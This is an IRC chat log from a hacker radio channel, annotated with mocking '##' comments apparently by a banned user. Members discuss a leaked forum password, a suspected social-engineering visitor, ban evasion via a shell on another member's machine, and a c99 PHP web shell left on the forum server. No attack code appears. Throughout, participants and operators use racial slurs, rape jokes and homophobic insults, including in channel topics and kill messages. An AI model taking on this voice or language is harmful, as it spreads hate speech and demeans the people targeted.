<&Vesalius> _hyper_, some guy with an IPB exploit 13:25 <&_hyper_> heh cool 13:26 <&SHAGGSTaRR> Ves if you get a shedload of pms then it's probably the ykstort one 13:26 <&Vesalius> he posted my forum password in here #LOL I CRY WITH LAUGH 13:26 <&Vesalius> SHAGGSTaRR, Ykstort? 13:26 <+Zakolus> there weren't any PMs when I was on 13:26 <&SHAGGSTaRR> I tried to make a thread from your account that said "Disregard my posts, I suck cocks." 13:26 <&SHAGGSTaRR> But didnt have the heart to pwn you so much 13:26 <&Vesalius> lol 13:26 <+Zakolus> XD 13:26 <+l0l> dude 13:26 <+l0l> pwnage is neccessary 13:26 <+l0l> its the way of t3h int4rw3bz 13:27 <&SHAGGSTaRR> nah I respect ves 13:27 <+Zakolus> orly 13:27 <&SHAGGSTaRR> because he didnt leave me and jojo stranded in brum mainly 13:27 <&Vesalius> /node 13:27 <&Vesalius> -e 13:27 <&Vesalius> and I can /gline & /kill 13:27 <&Vesalius> =] 13:27 <+l0l> are you a gay couple? 13:27 <&SHAGGSTaRR> And he only tried to rape me twice at night, far less than expected. 13:27 <&_hyper_> brb 13:27 * DesertRose pulls out the video camera again 13:27 <+l0l> use rapex 13:27 <+l0l> and a knife 13:27 <+Zakolus> psg, are you on the forums? 13:28 <&Vesalius> I didnt try and rape anyone 13:28 <&Vesalius> I was trying to sleep through _hyper_'s snoring 13:28 <+DesertRose> what, you succeeded? ;p 13:28 <+l0l> rape is fun 13:28 * Vesalius can still remember _hyper_ in the morning when he looked around for me 13:28 <&Vesalius> lol 13:28 <+psg> [19:31] I'd change your password on HVR. ##psg giving advice wow, shame no one is ever going to listen to you again 13:28 <+x4e> yeah next time you wake up with a used rubber hanging out our ass im sure you gonna think that l0l :D 13:28 <+psg> And change all passwords that match it on other sites with your nick. #DUHH 13:28 <+psg> ;) 13:28 <+Zakolus> ah, yeah.. 13:29 <+l0l> x4e: its not me who _is_ raped 13:29 <&Vesalius> naxx : "Yeah vesalius climbed on the roof and dropped the pmr" 13:29 <+l0l> x4e: you got that part wrong. sorry, but you fail. 13:29 <&Vesalius> * _hyper_ looks around frantically 13:29 <&Vesalius> lol 13:29 <+Zakolus> psg, I don't use that password on any other sites.. xD #liar, your mail is lol. 13:29 <&Vesalius> psg, I dont have any that are the same =] # AGAIN, LYING TO SAFE FACE 13:29 <+Zakolus> XD 13:29 <&Vesalius> and I changed it =] 13:29 <+l0l> <&Vesalius> psg, I dont have any that are the same =] 13:29 <+psg> me either. #HAH 13:29 <+l0l> they all say that. 13:30 <+psg> :P 13:30 <&Vesalius> l0l, I don't 13:30 <+l0l> you just ddi. 13:30 <&Vesalius> I didn't know it was mine lol 13:30 <+x4e> was only 3 char anyway ves? i could of guessed that in 3 :D 13:30 <&Vesalius> firefox has updated my password on the forums 13:30 <&Vesalius> for almost dunno 13:30 <&Vesalius> a long time 13:30 <&Vesalius> s/updated/inserted/ 13:31 <&SHAGGSTaRR> so how do you log in if you're not at THAT computer? 13:31 <&SHAGGSTaRR> if you cant remember your pass 13:31 <&_hyper_> sorry back now# 13:31 <+Zakolus> wb 13:31 <&_hyper_> ty 13:32 <&Vesalius> SHAGGSTaRR, I don't 13:32 <&Vesalius> im hardly ever at another computer 13:32 <&Vesalius> infact 13:32 <&Vesalius> I never am 13:32 <&SHAGGSTaRR> You're missing out on one of the key brilliances of the intertubes then. 13:32 <&SHAGGSTaRR> Being able to take your shit with you no matter where you might happen to land yourself. 13:33 <&Vesalius> thats what the laptop is for 13:33 <+DesertRose> Shagg, was it you who was in like.... Portugal, I think 13:33 <+DesertRose> and said you went to the internet cafe across the street from the hotwl 13:33 <&SHAGGSTaRR> What if you pwnd a machine (that wasn't an led display) at brumhv and wanted to post from it? 13:33 <+DesertRose> *hotel 13:33 <&SHAGGSTaRR> yeah, it was spain. 13:33 <+DesertRose> ah Spain 13:34 <&Vesalius> SHAGGSTaRR, machine or led display.. 13:34 <&Vesalius> whats the obvious choice? 13:34 <+DesertRose> right, was just wondering if that was you or someone else, heh 13:34 <&SHAGGSTaRR> Touche =/ 13:34 <&SHAGGSTaRR> Timboss went to portugal 13:34 <+DesertRose> yeah 13:34 <+DesertRose> I remember now 13:34 <&SHAGGSTaRR> Ves what if you weren't in Craplins then? 13:34 <&Vesalius> id go to there 13:34 <&SHAGGSTaRR> lol 13:35 <&SHAGGSTaRR> What if you wanted to prove some amazingly leet shit and post FROM THE LED DISPLAY? 13:35 <&Vesalius> then if I could do that I could get my password somehow 13:35 <&SHAGGSTaRR> How? 13:35 <&Vesalius> how would I post from the led display? 13:36 <+x4e> or use someone elses credentials @ vesalius 13:36 <&SHAGGSTaRR> ssh into your box and run through your firefox cookies with a text editor? 13:36 <&Vesalius> SHAGGSTaRR, not a bad idea..lol 13:36 <&Vesalius> except 13:36 <&SHAGGSTaRR> Or you could just remember your passwords... 13:36 <&Vesalius> ipb doesnt store pwds in cookies #l0l 13:36 <&SHAGGSTaRR> If you don't someone else will ;P 13:36 <&SHAGGSTaRR> How does it then? 13:36 <&Vesalius> that password was a random password 13:36 <&Vesalius> from my tfom.net login info # wait, I thought you didn't re-use nigger? 13:37 <&SHAGGSTaRR> openid? 13:37 <&Vesalius> ? 13:37 <&SHAGGSTaRR> Where you store your shit on either your server or a dedicated openif box 13:37 <&Vesalius> this machine 13:37 <&SHAGGSTaRR> and the server you wanna log into runs a check with your openid host and checks you are who you say you are 13:38 <&SHAGGSTaRR> meant to make the whole process more streamlined but I've not looked into it too much 13:38 <&SHAGGSTaRR> I might host openflid for myself and jojo if it actually kicks off 13:39 <&Vesalius> great 13:39 <&Vesalius> I have blue tak stuck in my ear 13:40 <&SHAGGSTaRR> http://openid.net/ 13:40 <&Vesalius> thats better 13:40 <&SHAGGSTaRR> Better than having muftak on yout IRC 13:40 <&SHAGGSTaRR> >_> 13:40 <&SHAGGSTaRR> <_< 13:43 <+x4e> Anyone know where I can buy individual SecureId's? seems every site sells them in packs of 5 :S 13:44 <&SHAGGSTaRR> Your best bet would be a shoop 13:44 <&SHAGGSTaRR> A shop even 13:44 <&SHAGGSTaRR> no 13:44 <&SHAGGSTaRR> a shoop 13:44 <&SHAGGSTaRR> Shoop da whoop for a pack de uno 13:44 <+x4e> which shoop? :) 13:44 <&SHAGGSTaRR> No idea, you'd deffo know better than me 13:44 <&SHAGGSTaRR> But for the fact that even if they sell in packs of 5 or so only 13:45 <&SHAGGSTaRR> you can say to the store guy "Hey, can I just 'ave one please mate?" 13:45 <+x4e> hmm could try :D 13:45 <&SHAGGSTaRR> Like how I bought 3 single dvds instead of the whole pack of ten yesterday 13:45 <+x4e> Anyone got any spare (steal from work?) SecureId's ? 13:46 <&SHAGGSTaRR> I have an NHS ID holder to go round your neck 13:46 <&SHAGGSTaRR> And probably the id 13:46 <+x4e> see thats not really the same thing shaggstar 13:46 <&SHAGGSTaRR> I also know I could use my library cards outer lamination over a self made ID in there 13:46 <+x4e> unless i want to be a pretend gynocologist 13:46 <&SHAGGSTaRR> hmm so what exactly are these things you're after? 13:46 <&SHAGGSTaRR> I don't need to pretend. 13:46 <&SHAGGSTaRR> I hang with you minges all day. 13:47 <&SHAGGSTaRR> hmm so what exactly are these things you're after? 13:47 <+x4e> http://www.rsa.com/node.aspx?id=1156 13:50 <+Zakolus> afk, gotsta takes a powa showa 13:51 <&Vesalius> http://www.wikitruth.info/index.php?title=Brian_Peppers_Day 13:54 -!- Zakolus [0x5A616B@thv-8D866938.bna.bellsouth.net] has quit [Ping timeout] 13:56 -!- Zakolus [0x5A616B@thv-7BE41BC5.ard.bellsouth.net] has joined #hvr 13:56 -!- mode/#hvr [+v Zakolus] by ChanServ 13:58 <+Timboss> [19:37] Timboss went to portugal 13:58 <+Timboss> yeah i did 13:59 <+Timboss> went for a month travelling 13:59 <+Timboss> went to the largest phycadelic festival in europe while i was there 13:59 <+Timboss> best travel holiday ever... 13:59 * Timboss goes back to work 14:03 <@zinya-> why the fuck would anyone want a winblows skin for their gp2x? 14:04 <+Jordan> do u have a gp2x? 14:04 <+psg> zinya: homesick 14:04 * psg ducks. 14:06 <&_hyper_> right gotta das 14:06 <&_hyper_> h 14:06 <+Zakolus> cya 14:06 -!- _hyper_ [hyper@members.hackervoice.co.uk] has quit [Quit: Leaving] 14:09 -!- JohnDownings [John.downi@87957328.17CFA09A.A68D6B36.IP] has joined #hvr 14:10 <+Zakolus> >.> 14:10 < JohnDownings> Umm...Hello? 14:10 <+Zakolus> hi 14:10 -!- mode/#hvr [+v JohnDownings] by Vesalius 14:10 <@zinya-> shaman, i need help 14:10 <+JohnDownings> Hi im new to this so bear with me, is there someone i could talk to about your site here? i havn't used "IRC" before 14:11 <+Zakolus> Sure, whats up John? 14:11 <+psg> Isn't attempted social engineering wonder. ##LOL PSG IS ON TO ME, OH NO :| 14:11 <+Zakolus> psg, what do you mean? 14:11 <+psg> oh nothing. 14:11 <+Zakolus> okay.. 14:12 <+JohnDownings> Im doing research on hacking and the 'state' of the internet at school. According to my teacher I need some views from both sides. 14:12 <+Zakolus> okay.. 14:12 <+JohnDownings> So I thought why not try and talk to some "hackers" 14:12 <+Zakolus> lulz 14:13 <&Vesalius> lolz 14:13 <&Vesalius> JohnDownings, rule 1. INTERNETS R LAW 14:13 <&Vesalius> kthnx 14:13 <+Zakolus> Vesalius, is that the biggest load of crap you've ever heard? 14:13 <&Vesalius> ..? 14:13 <+Zakolus> this guy, John, says he is reporting on "hacking" 14:13 <+Zakolus> rofl 14:13 <+JohnDownings> No im not reporting 14:14 <+Zakolus> whatever 14:14 <+JohnDownings> Im writing a school report 14:14 <+psg> More believable. Good start. Poor execution sir. 14:14 <+Zakolus> psg, this is htek, isn't it. 14:14 <+psg> I would imagine so. 14:14 <+Zakolus> heh. 14:14 <&Vesalius> if he really isn't htek then you'd all feel bad 14:14 <+Zakolus> feel bad about what? 14:14 <&Vesalius> nvm 14:14 <+psg> Not especially. 14:15 <&Vesalius> JohnDownings, no hackers here ##HAHAHA YOU GOT DAT RIGHT NIG 14:15 <@zinya-> does everyone connecting get masked ip? 14:15 <+Zakolus> Yes. 14:15 <@zinya-> woah that was bad english 14:15 <+JohnDownings> I swear on my valve accounts life I have no idea what on earth you are talking about 14:15 <+Zakolus> I understood it.. 14:15 <&Vesalius> valve.. 14:15 <+Zakolus> John, how can you know what "valve" is and not what "IRC" is.. 14:15 <+Zakolus> Do you seriously think we are that stoopid? 14:15 <&Vesalius> I know what IRC is 14:15 <&Vesalius> WTF IS VALVE 14:16 <@zinya-> lol 14:16 <+JohnDownings> lol 14:16 <@oOJINxOo_> steam* i think he means 14:16 <@zinya-> someone says valve, i think half-life 14:16 <&Vesalius> JohnDownings, there was this really really amazing hacker in here earlier though 14:16 <+Zakolus> yeah. same here. 14:16 <&Vesalius> his name was htek 14:16 <&Vesalius> he was pwning us left right and center 14:16 <+JohnDownings> Does nobody want to speak to me? I only have a few questions 14:16 <&Vesalius> until he got glined 14:17 <+Zakolus> Noone wants to talk John, go away.. 14:17 <&Vesalius> Zakolus, be nice 14:17 <+Zakolus> >.> 14:17 <+psg> john: try #cdc on efnet ## STILL NO HACKERS THERE :/ 14:17 <&Vesalius> we dont really have much proof he is infact htek 14:17 <+Zakolus> still, I don't think anyone wants to talk.. 14:17 <+JohnDownings> What is that psg? 14:17 <&Vesalius> hmm 14:17 <+psg> an irc channel? 14:18 <+psg> wait sorry "irc" 14:18 <&Vesalius> JohnDownings, how did you get on irc? 14:18 <+psg> I am not a hacker... i am a marketeer. 14:18 <+psg> :P 14:18 <&Vesalius> JohnDownings, did you install just mIRC? 14:18 <&Vesalius> because you are connected via SSL 14:19 <+Zakolus> >.> 14:19 <+Zakolus> ;-; 14:19 <&Vesalius> HAHAHAHHAHAHAHA 14:19 <&Vesalius> JohnDownings, you are htek 14:19 <&Vesalius> tfom@TFOM:~$ host 80.159.79.222 14:19 <&Vesalius> Host 222.79.159.80.in-addr.arpa not found: 3(NXDOMAIN) 14:19 <&Vesalius> check that host 14:19 -!- JohnDownings [John.downi@87957328.17CFA09A.A68D6B36.IP] has quit [User has been permanently banned from THVNet (evading..GTFO COON)] 14:19 <+n0x> JohnDownings> Anyway, I goto college in East London 14:19 <&SHAGGSTaRR> 204.10.111.201 14:19 <+psg> He'll be at that a while. 14:19 <&SHAGGSTaRR> thats the ip he was using before 14:19 <&Vesalius> yup 14:19 <+n0x> yea we are from the uk.. we know where lancashire is 14:20 <+psg> That might well be lulling you into a false sense of security 14:20 <+psg> i'd do it badly once or twice 14:20 <+psg> wait a few hours... then have a real go ##GOOD IDEA PSG, BUT I ALREADY OWNED THESE FAGS 14:20 <+psg> ;) 14:20 <&Vesalius> if hes black 14:20 <&Vesalius> hes gonna be pissed at me 14:20 <+psg> or am i giving the kid too much credit? 14:20 <+psg> he reminds me of me when I was 14 ### ROFLLLZ im going to use that insult, possibly make a tshirt "YOUR LIKE PSG WHEN HE WAS 14" LOL LOL 14:20 <+n0x> vesalius, so..? 14:20 <+psg> :| 14:21 <+Zakolus> :| 14:21 <&Vesalius> good point 14:21 <&Vesalius> for a start he was on IRC 14:21 <&Vesalius> and for someone with no knowledge of anything like that 14:21 <&Vesalius> how'd he install the SSL components.. 14:21 <+n0x> vesalius, you can buy "coon cheese" in australia ;) 14:22 <+Zakolus> XO 14:22 <&Vesalius> lol 14:22 <+Zakolus> ROFL @ the ZipCode for his original IP is 33137 14:22 <&Vesalius> ? 14:22 <+Zakolus> so close, yet, so far 14:23 <+Zakolus> PostalCode: 33137 14:23 <+Zakolus> in america, they are called ZipCode.. 14:23 <+Zakolus> afk for a sec. 14:23 <@muftak> bah, there isn't a 31337 zipcode 14:24 <&Vesalius> I know they are called ZipCodes 14:24 <+BOfH> What's a zipcode? 14:24 <+BOfH> Is it a serial number on a device that keeps your trousers up? 14:24 <&Vesalius> BOfH, they don't have them in nigeria 14:24 <&Vesalius> so you wouldn't know =] 14:25 <&Vesalius> = p 14:25 <@muftak> i want to live in the place with the postcode E1 3ET 14:25 <&SHAGGSTaRR> lol 14:25 <&SHAGGSTaRR> Sounds mexical 14:25 <&SHAGGSTaRR> el eet 14:25 <&SHAGGSTaRR> el leeto 14:25 <&Vesalius> hahaha 14:25 <@muftak> i will buy it when i win the lottery 14:26 <+Zakolus> s/when/if 14:26 -!- tfom [~tfom@thv-1DCD6AC2] has joined #hvr 14:26 -!- tfom is now known as SUPERDUPERHACKERMAN 14:26 -!- mode/#hvr [+v SUPERDUPERHACKERMAN] by SHAGGSTaRR 14:26 <+Zakolus> >.> 14:26 <&Vesalius> ? 14:26 <&SHAGGSTaRR> SUPERDUPERHACKERMAN is on Ves's lan? 14:26 <&Vesalius> .. 14:26 <&Vesalius> =S 14:27 <&SHAGGSTaRR> Looks like it from the short hostmask 14:27 <+Zakolus> lolhax 14:27 <&Vesalius> thats not good is it? 14:27 <+Zakolus> No, its not xD 14:27 <+SUPERDUPERHACKERMAN> Zakolus is right 14:27 <+SUPERDUPERHACKERMAN> its not 14:27 <&SHAGGSTaRR> If you know what it is then sure 14:27 <&Vesalius> ¬_¬ 14:27 <&SHAGGSTaRR> But if that's not you Ves 14:27 <&Vesalius> of course its me 14:27 <+SUPERDUPERHACKERMAN> you coon 14:28 -!- SUPERDUPERHACKERMAN [~tfom@thv-1DCD6AC2] has quit [[irc.tfom.org] Local kill by Vesalius (no racism kthnx coon)] 14:28 <+Zakolus> XD 14:28 <&Vesalius> lol 14:28 <&Vesalius> /kill'd from my own server 14:28 <&SHAGGSTaRR> "No racism and no niggers" woulda been funnier 14:28 <+Zakolus> AHHHHH @ the tv is too loud 14:28 <+Zakolus> brb 14:29 <@muftak> SHAGGSTaRR: that should be the topic 14:29 -!- SHAGGSTaRR changed the topic of #hvr to: HA - CKER VOICE RADIOOOO | #brumhv..EVERYONE LEAVE BIRMINGHAM!!! | 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 | we should have sajoin'd shaggstar and jojo into the pub | http://stream.hackervoice.co.uk:8000/stream.mp3.m3u teh stream | i am jealous of your life | No racism and no nigge 14:29 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has joined #hvr 14:29 <&Vesalius> NIGGE 14:29 <&Vesalius> KILL THE NIGGES 14:29 -!- SHAGGSTaRR changed the topic of #hvr to: HA - CKER VOICE RADIOOOO | 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 | we should have sajoin'd shaggstar and jojo into the pub | http://stream.hackervoice.co.uk:8000/stream.mp3.m3u teh stream | i am jealous of your life | No racism and no nigge 14:29 <&Vesalius> htek, how many times 14:29 -!- SHAGGSTaRR changed the topic of #hvr to: HA - CKER VOICE RADIOOOO | 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 | we should have sajoin'd shaggstar and jojo into the pub | http://stream.hackervoice.co.uk:8000/stream.mp3.m3u teh stream | i am jealous of your life | No racism and no niggers 14:29 < htek> wait ## logged in from naxxtors SE'd shell LOL 14:29 <&Vesalius> must I raep you from the server? 14:29 < htek> im on naxxtors box 14:29 < htek> dont gline me 14:30 <&SHAGGSTaRR> Lets hear him out 14:30 <&SHAGGSTaRR> For the lulz 14:30 <+Zakolus> yeah... XD 14:30 <&Vesalius> oh shite 14:30 <&Vesalius> I can't gline him..hmm 14:30 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has left #hvr [Left all channels] 14:30 <&Vesalius> oops 14:30 -!- DesertRose [RetroJade5@thv-E9E348F8.alshamil.net.ae] has quit [Quit: but every once in a while, i wish i had a really hot sister. whose face I could incest up.] 14:30 <&SHAGGSTaRR> LOL WHAT 14:30 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has joined #hvr 14:30 <&SHAGGSTaRR> * htek (m4tr1x@thv-52CF79AD.plus.com) has left #hvr (Left all channels) 14:30 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has left #hvr [Left all channels] 14:31 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has joined #hvr 14:31 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has left #hvr [Left all channels] 14:31 <&Vesalius> lol 14:31 <+Zakolus> o_o 14:31 <&SHAGGSTaRR> htek == m4tr1x ##WELL DONE EINSTEIN 14:31 <&Vesalius> yup 14:31 <&SHAGGSTaRR> XD 14:31 <+Zakolus> Ahh. xD 14:31 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has joined #hvr 14:31 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has left #hvr [Left all channels] 14:31 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has joined #hvr 14:31 <&SHAGGSTaRR> BRING IT BACK 14:31 < htek> battle of the up key 14:31 < htek> WOOT 14:31 <&SHAGGSTaRR> SING IT BACK 14:31 < htek> winner 14:31 < htek> lol 14:31 <&Vesalius> htek, gtfo coon 14:32 <&Vesalius> htek, leave or be leaved 14:32 <&Vesalius> kthnx 14:33 <&Vesalius> htek, have anything to say before I gline you? 14:33 <+n0x> arguing on the intarwebs, even if you win, you're still a retard! 14:33 < htek> yes 14:33 <&Vesalius> what? 14:33 < htek> that John character seriously wasnt me 14:33 < htek> as much as i hate psg ##YES 14:33 <&Vesalius> htek, you 14:33 -!- htek was kicked from #hvr by muftak [I wish I was gay like Vesalius ] 14:33 <&Vesalius> are a FUCKING fool 14:34 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has joined #hvr 14:34 <&Vesalius> then how do you know about him 14:34 <&Vesalius> dipshit? 14:34 <+n0x> wait... how did he know about "john" 14:34 < htek> lol, im not here on my own 14:34 < htek> "dipshit" 14:34 <&Vesalius> okay 14:34 <&Vesalius> htek, any last words? 14:34 < htek> thats the only reason i came back now on naxx's boix 14:34 <&Vesalius> the gline is coming =] 14:34 <&SHAGGSTaRR> To say that you're not john? 14:35 < htek> yea, i thought it was damn funny 14:35 -!- htek [m4tr1x@thv-52CF79AD.plus.com] has quit [User has been permanently banned from THVNet (no reason)] 14:35 <&SHAGGSTaRR> Wasn't that whole john thing happenening when you weren't even around? 14:35 <@muftak> i'm john, and so is my wife 14:35 <&Vesalius> GLINE 14:35 <&SHAGGSTaRR> MY KIDS NAME'S HONDA 14:35 <&SHAGGSTaRR> MY WIFES NAME'S HONDA 14:35 <&SHAGGSTaRR> MY FIRST WORDS 14:35 <&SHAGGSTaRR> HONDA 14:36 <&SHAGGSTaRR> WHOOOAAAAAW THIS HONDA'S BLACK 14:36 <&SHAGGSTaRR> LIKE MY WIFE 14:36 * Vesalius waits for him to come back 14:37 <&Vesalius> according to his whois 14:37 <&Vesalius> he is on the same machine as naxxtor 14:37 <&SHAGGSTaRR> He's still here 14:37 <&SHAGGSTaRR> hmm he's gone 14:37 -!- belial [belial@thv-C1670C73.bethere.co.uk] has joined #hvr ##YAY the fatty is in the house 14:37 < belial> hello 14:37 < belial> i cant use my main machine coz its being used by femail 14:37 < belial> so whats beeing going on? 14:38 <+Jordan> some htec prick been fucking around 14:38 <+Jordan> htek* 14:38 < belial> ok 14:38 <+psg> he is still here 14:38 <+psg> l0l 14:38 <+psg> ;) 14:38 < belial> well im well aware that we are running an out of date forum 14:38 -!- Zako [0x5A616B@thv-B0395498.ard.bellsouth.net] has joined #hvr 14:38 -!- htek [~tfom@B1223523.114FEC1A.2F9399C7.IP] has joined #hvr 14:38 < Zako> whoops 14:38 <+Jordan> and hes back 14:38 < Zako> X3 14:38 < Zako> >.> 14:38 <+cybereagle> hahaha 14:38 <+cybereagle> well that was predictable 14:38 < htek> you lot are idiots =P 14:39 <+cybereagle> whys that? 14:39 < htek> ... 14:39 < htek> learn the wonders of /whois 14:39 <+cybereagle> i'm just in an irc channel 14:39 <+Jordan> thanks but im sure your the biggest one of the lot 14:39 <+cybereagle> ok wtf? 14:39 < belial> htek, what makes you want to abuse people? 14:39 < htek> lol 14:39 < Zako> htek = naxx 14:39 < Zako> ? 14:39 < htek> this isn't htek 14:39 -!- Zakolus [0x5A616B@thv-7BE41BC5.ard.bellsouth.net] has quit [Ping timeout] 14:39 < htek> ¬_¬ 14:39 < htek> <-- Vesalius 14:39 < Zako> o rly? xD 14:39 <+cybereagle> well, you have the nick htek 14:39 <&Vesalius> yesrly 14:39 <+cybereagle> that means we abuse you 14:40 <+cybereagle> open wide 14:40 <+cybereagle> :D 14:40 <&Vesalius> lol 14:40 < Zako> XD 14:40 <&Vesalius> XD 14:40 -!- Zako is now known as Zakolus 14:40 < belial> i fucking give up 14:40 <&Vesalius> its so if he comes back he'll be pissed that someones taken the nick 14:40 -!- belial [belial@thv-C1670C73.bethere.co.uk] has quit [Quit: leaving] 14:40 <+cybereagle> i dont think he really will 14:40 < Zakolus> afk 14:40 <&Vesalius> ... 14:40 <+psg> Ves: how long, was it you? 14:40 <+cybereagle> dont try to impress him, really, unless your a defacer withj leet speak and you know a guy he knows 14:40 <+psg> ;) 14:40 <+cybereagle> he wont be impresed 14:40 <&Vesalius> psg, since I just joined 14:41 <&Vesalius> i fucking give up 14:41 <&Vesalius> =S 14:41 <+Jordan> i think/hope he'll be back ves 14:41 < htek> gdgd 14:41 <+cybereagle> you could take the most beautiful bit of code and he'd look at the comment header and say it was lame 14:41 -!- htek [~tfom@B1223523.114FEC1A.2F9399C7.IP] has quit [OMGZ BAI2U!!1] 14:42 <&Vesalius> why does belial give up? 14:43 <+cybereagle> my theory is, everyone needs a beer 14:43 <&Vesalius> hmm 14:43 <&Vesalius> I dont like beer 14:43 <+Jordan> well u send em us cybereagle 14:44 -!- n0x-- [n0x@thv-438F509A.in-addr.btopenworld.com] has joined #hvr 14:44 -!- n0x-- [n0x@thv-438F509A.in-addr.btopenworld.com] has left #hvr [Leaving] 14:44 <&SHAGGSTaRR> hibye 14:44 <+n0x> haha 14:45 -!- htek [n0x@thv-438F509A.in-addr.btopenworld.com] has joined #hvr 14:45 -!- mode/#hvr [+v htek] by ChanServ 14:45 <+htek> he won't be using the nick anymore ##oh no, like its my nick anyway, noob. 14:45 <&Vesalius> hahaha 14:45 <&Vesalius> =] 14:45 <+htek> nickserv is a beautiful thing 14:45 <+psg> msg nickserv kill htek dickfuck 14:45 <&Vesalius> htek, change your nick then =] 14:45 <+cybereagle> Vesalius, you just need good real ale 14:45 -!- Zakolus [0x5A616B@thv-B0395498.ard.bellsouth.net] has quit [Ping timeout] 14:45 -!- htek [n0x@thv-438F509A.in-addr.btopenworld.com] has quit [Quit: Leaving] 14:46 -!- Vesalius is now known as htek 14:46 <&htek> =] 14:46 <+cybereagle> wow, so erm 14:46 -!- htek is now known as Vesalius 14:46 <&Vesalius> does he not understand im a services admin too? 14:46 -!- Jordan is now known as htek 14:46 -!- htek is now known as hteksuckz 14:46 <+cybereagle> now write a snort rule for any irc packet with htek in and drop it silently 14:46 -!- hteksuckz is now known as Jordan 14:46 <&Vesalius> -NickServ- Nickname htek has been dropped. 14:47 <+cybereagle> imagine that, he owned you with your own nickserv 14:47 <&Vesalius> cybereagle, ? 14:47 <+n0x> btw, it was me that just regged the htek nick 14:47 <&Vesalius> oh 14:47 <&Vesalius> well 14:47 <&Vesalius> that nickname is banned from being registered 14:48 <&Vesalius> kthnx 14:48 <+cybereagle> lol 14:48 <+n0x> ahh even better 14:48 <&Vesalius> oo 14:48 <&Vesalius> I wonder if I can ghost him 14:48 <+cybereagle> where was htek when i was lookig for an excuse to procastinate my dissertation 14:48 <+cybereagle> nothing like a good pointless rant to keep you occupied :D 14:49 * Vesalius wants htek to come back 14:49 <+cybereagle> my blood presure thinks he shouldnt, yet my pimp hands desires it ##A little later on ## 16:09 -!- belial [belial@thv-C1670C73.bethere.co.uk] has joined #hvr 16:09 < belial> the forums are going to be down for a short while ## :( 16:11 <&Vesalius> okay 16:11 <&Vesalius> belial, what was wrong earlier? 16:12 < belial> i was doing like 5 things at the same time as well as sorting out the vurnablities on the forums 16:12 < belial> so i just got pissed off with that guy or whever he was 16:13 < belial> had to take some offline time to concentrate on what i was doing 16:13 <&Vesalius> oh sorry 16:13 <&Vesalius> that guy was me 16:13 <&Vesalius> not all the time 16:13 <&Vesalius> but when you were here 16:13 <&Vesalius> and he joined, I connected as him 16:13 <&_hyper_> bololcks 16:14 <&Vesalius> so he couldn't use that nick 16:14 <&_hyper_> just finished writing a massive post 16:14 <&_hyper_> >:( 16:14 <&SHAGGSTaRR> link? 16:14 <&_hyper_> the forums went down 16:14 <&SHAGGSTaRR> :o 16:15 -!- adiboy [adiboy@thv-4A7E7657.bagu.cable.ntl.com] has quit [Quit: Leaving] 16:15 < belial> yeah sorry i am having to do this manualy somewhat due to the extreamly hacked nature of our forums (hacked in a good way) 16:15 < belial> so its all going to be down till i can upgrade 16:15 < belial> shouldnt take too long id imagine 16:15 <&Vesalius> its okay =] 16:16 -!- mode/#hvr [+q belial] by Vesalius 16:16 <~belial> in the mean time while the forums are down 16:16 <&Vesalius> they'll always be arseholes out there trying to ruin it 16:16 <~belial> what the hell happend anyway? 16:16 <&_hyper_> pm belial 16:16 <&Vesalius> he appears to heavily dislike psg for some reason ##yessssir 16:16 <&Vesalius> and when he noticed him 16:16 <&Vesalius> he started complaining about hackers miss representing other 16:16 <&Vesalius> s 16:16 <&Vesalius> and elitist stuck up self conscious fuckers 16:16 <&Vesalius> lol 16:16 <&Vesalius> lol 16:17 <&SHAGGSTaRR> One of which he happened to be 16:17 <&Vesalius> yup 16:17 <&_hyper_> what was his handle again? 16:17 <&Vesalius> htek 16:17 <&SHAGGSTaRR> htek 16:17 <&Vesalius> and as per usual 16:17 <&_hyper_> that was it 16:17 <&Vesalius> he started an argument here 16:17 <&Vesalius> and 16:17 <&Vesalius> got virtually no where #LOL 16:17 <&Vesalius> as me and SHAGGSTaRR were active 16:17 <&Vesalius> so he got some rather amusing things back =] 16:17 <&SHAGGSTaRR> ROFL at itv1 16:17 <~Be|ia|> btw he was useing a shell 16:17 <&_hyper_> dont suppose you whoised him did you? 16:18 <&Vesalius> and then he posted my password in here 16:18 <&SHAGGSTaRR> this show is fucking badasssss 16:18 <&Vesalius> _hyper_, yup 16:18 <~Be|ia|> that the forum is vunrable too 16:18 <@shaman> what's up with the forums? 16:18 <&Vesalius> I've restarted since =[ 16:18 <~Be|ia|> but it wasnt even his exploit ##NIGGA WUUUT? 16:18 <&Vesalius> but I have logs somewhere 16:18 <~Be|ia|> he just found that 16:18 <&SHAGGSTaRR> so wait 16:18 <&SHAGGSTaRR> it wasnt a forum exploit 16:18 <&SHAGGSTaRR> but a shell he gained? 16:18 <&SHAGGSTaRR> ssh vuln? #YES 0DAY LOL 16:19 <~belial> no no 16:19 <~belial> ill explain 16:19 <~belial> ive been fucking around with this C$hell thing 16:19 <~belial> c99 shell ##dud3, i wudn't lower myself 16:19 <@shaman> did I miss something? 16:19 <~belial> its a PHP page 16:19 <&SHAGGSTaRR> Web based shell? 16:19 <~belial> that you upload and take control over the webserver 16:19 <~belial> yeh 16:19 <&SHAGGSTaRR> ooh not good 16:20 <~belial> so he must have found it 16:20 <&SHAGGSTaRR> That shit's typically something you never use on a box YOU pay for 16:20 <&SHAGGSTaRR> For a reason. 16:20 <&SHAGGSTaRR> :P 16:20 <@shaman> *cough* 16:20 <@shaman> what's going on? :P 16:20 <~belial> yeah i had this happen to the galleries so natrually i removed it 16:20 <~belial> but then i stuck it on a random folder 16:20 <~belial> but guessing it got indexed 16:21 <&_hyper_> Shaman: our forums are full of holes 16:21 <&SHAGGSTaRR> Stick it somewhere not so obvious and see what security precautions you can mod onto it 16:21 <&_hyper_> so where updating them 16:21 <&Vesalius> belial, its php? 16:22 <@shaman> not good :\ 16:22 <~naxxtor> huh what eh 16:22 <&Vesalius> OH NOW he appears 16:22 <~belial> yeah itws php based 16:22 <~naxxtor> what's going on 16:22 <&Vesalius> maplins 16:22 <+x4e> the passwords in 